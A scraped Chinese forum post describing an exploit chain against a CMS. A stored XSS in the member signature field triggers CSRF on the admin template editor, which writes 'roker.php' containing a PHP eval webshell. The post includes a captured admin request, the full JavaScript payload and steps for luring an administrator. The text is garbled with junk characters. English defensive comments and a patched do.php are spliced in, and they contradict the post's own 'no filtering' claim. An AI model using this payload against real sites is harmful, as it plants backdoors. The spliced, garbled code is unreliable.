|
这个 CMS 以前 90有人发了个 getshell,当时是后台验证文件的问题。
官网已经修补了,所以重新下载了源码。
因为后台登录还需要验证码,所以注入就没看了。
存在 XSS。
漏洞文件:user/member/skin_edit.php
! V3 E$ K' w4 V+ T本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
8 M( s+ s& F3 L- [ ' b: V* z5 M3 L! b2 F6 U1 `- ~
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>0 q+ L* \/ g! Q6 V' [% m8 ]0 s! h! p
3 Z# H8 M' f6 B3 H) q</textarea></td></tr>7 i1 x, y2 u1 t, r& V; e2 K; s
# L* X' A. {' ~% Y# V0 _) T3 j" Y
user/do.php
. C9 Y$ ~% A6 x) [2 y% h4 z7 L3 h3 u# Z4 m' i
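if($op=='zl'){ //资料
    // Profile update. Every CS_* value comes from the request; the original
    // spliced them raw into the UPDATE statement, and the stored CS_Qianm is
    // later echoed unescaped by skin_edit.php (that is the XSS described above).
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));

    // SQL-escape every string that is interpolated into the query, including
    // the session name used in WHERE. addslashes() is a stopgap: prefer the
    // $db wrapper's own escaping or a prepared statement if it offers one
    // (not visible here). If request input is already escaped globally
    // (magic_quotes or a framework filter — also not visible here), drop these
    // calls to avoid double-escaping.
    $nichen = addslashes($CS_Nichen);
    $email  = addslashes($CS_Email);
    $city   = addslashes($CS_City);
    $qq     = addslashes($CS_QQ);
    $qianm  = addslashes($CS_Qianm);
    $name   = addslashes($cscms_name);
    // CS_Sex is written unquoted in the query, so force it to an integer.
    $sex    = (int)$CS_Sex;

    $sql = "update ".Getdbname('user')." set CS_Nichen='".$nichen."',CS_Email='".$email."',"
         ."CS_Sex=".$sex.",CS_City='".$city."',CS_QQ='".$qq."',CS_Qianm='".$qianm."'"
         ." where CS_Name='".$name."'";

    // Escaping here only protects the query. The XSS fix belongs at output:
    // every place that renders CS_Qianm (skin_edit.php's textarea, the public
    // profile page) must pass it through htmlspecialchars().
    if($db->query($sql)){
        exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
    }
}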
- D6 b( p4 i( C) ^# z0 z
没有过滤,导致 XSS 产生。
后台看了下,很奇葩的是可以写任意格式的文件。
抓包:
4 d& Q( C& q: ?! C( o8 w. h
1 h" ]1 x- f2 i4 t o
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1+ q4 p) U; ~ i8 r0 _
% m$ o8 a! R* T, V; I- BAccept: text/html, application/xhtml+xml, */*
+ S0 w8 ?% P8 |) P+ W- { & k, K7 M# [# d! }" \
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
: O* d# s k. p2 d$ P
4 g! T4 M6 }* D/ x. h. ^) a1 gAccept-Language: zh-CN
* n( \6 H% X; \: W4 B3 a " }/ V0 Q# w2 t
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" O" J S# t- `
" } p& |! j$ Z& d; R" x1 c+ v2 C/ MContent-Type: application/x-www-form-urlencoded
- @! p" ^4 u3 a% U. A8 j4 L. X v5 ], f5 o$ v6 L( {4 G
Accept-Encoding: gzip, deflate+ ]+ B6 e b3 P8 [' h- D+ K
1 z0 i/ o2 a+ K) j1 ]/ { I, xHost: 127.0.0.1
# W5 {/ v! \9 B: Z) X6 ]; \7 C
j: d9 b+ |& K; u3 A5 ^Content-Length: 38# o* u! X" \% L, ~
' U9 V, o$ m* V9 j1 V
DNT: 1
7 Q4 H7 o, z. J ) F/ n/ `+ U5 c
Connection: Keep-Alive& ^+ m$ c- u3 X& B& ` A
. Q4 R( z, k# V8 k3 oCache-Control: no-cache+ q8 |! p6 `. v, p9 M
) T% f) m" {! o# [ X7 XCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
# V$ F: ?) ~' h/ F6 ` ) \" A* M/ ^ y0 T' f/ w
. G$ e' O2 X& a* d8 N- xname=aaa.php&content=%3Cs%3E%3Ca%25%3E
) E; |) h3 h5 R7 P
3 j% f# I @( k
7 m! l- Q% B6 q8 h" }8 M4 E1 |0 ~! N! V9 S( v& l; p
于是构造 JS 如下。
, W# F' C" U+ ]/ c1 }1 m; P7 s# n& _3 f! X' P$ }: R- |. ?
本帖隐藏的内容<script> , j; D, {1 _' v/ L/ S
// NOTE(review): this is the stored-XSS payload the post places in the signature
// field. When it runs in an administrator's browser it performs a CSRF against
// the template editor (skins.php?ac=xgmb&op=go), which the captured request
// above shows accepts any file name and content. The fixes are server-side: a
// per-request CSRF token on that endpoint, a whitelist of writable template
// extensions, and htmlspecialchars() on the signature wherever it is rendered.
thisTHost = top.location.hostname;3 U. `3 ^/ r3 S# g6 A/ s
2 _3 y5 T! D9 h& c
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";- P9 b/ A2 Y$ l. W: g Z" ]+ `0 X
// Builds a hidden form with two fields ("name", "content") and auto-submits it
// as a POST to url; the victim's session cookies are attached by the browser,
// which is why a SameSite cookie attribute on the admin session also helps.
' h/ D' k# v6 _! y: |) [function PostSubmit(url, data, msg) {
2 t# x' {0 }5 d: F n( s1 | var postUrl = url;' N |% \+ ^- E7 u% L& i
$ _# G! K( }5 W4 ?
var postData = data;
% Y2 p/ u$ [8 k4 R/ Y p var msgData = msg;
, Y) a8 L* q) v3 P7 U8 b/ | var ExportForm = document.createElement("FORM"); ; X* Y+ l; O# N4 {2 V
document.body.appendChild(ExportForm);
3 ?0 Z' w0 h/ m3 h0 [ ExportForm.method = "POST"; % E5 E, | W2 O% k
var newElement = document.createElement("input"); * N$ O1 [8 C) s/ H: `. k4 l
newElement.setAttribute("name", "name");
* g* O: Y) X3 F4 B& Q$ r0 `/ y newElement.setAttribute("type", "hidden"); 9 H V% ?. J! g& b$ e
var newElement2 = document.createElement("input");
! a, |3 P4 Q0 o' H2 ] newElement2.setAttribute("name", "content"); 5 p4 z" Z; X2 ^7 X4 b5 l E! X
newElement2.setAttribute("type", "hidden");
* B+ n! t1 E4 T' o( L2 J ExportForm.appendChild(newElement);
4 {0 ]( V$ n0 j% }* \+ } ExportForm.appendChild(newElement2);
Y2 p' @0 J# F9 M3 V: A" A) { newElement.value = postData; 5 s, _" i8 D5 g5 q) ]
newElement2.value = msgData; % B% _4 W7 P) k9 u2 w" ^) R5 G% p
ExportForm.action = postUrl;
; L0 @$ @1 O( h6 N% S. O: [ ExportForm.submit();
9 U- i2 q3 m) d3 e* ^6 G; g};
; l* q! p4 }+ {: |
// Detection hint for defenders: a new .php file appearing under skins/.../html/
// right after an admin page view is the footprint of this chain.
7 n8 z1 x2 s4 Q' }) ]* C2 h JPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");$ ]4 \8 A1 m5 q! H/ f! P( Z
. E1 L2 ?- h& B/ |+ \( h' C
</script>
4 b/ j/ @! A& t, m4 e
$ V" Q J0 a* ~1 W6 H
" d/ \1 L/ G7 Y1 z% J
/ c) i, c- Y3 B9 Nhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入" i9 R+ o. O2 t
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
~1 y, M$ F; z" y就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
% W" \ f2 g2 _. }5 ^ |
|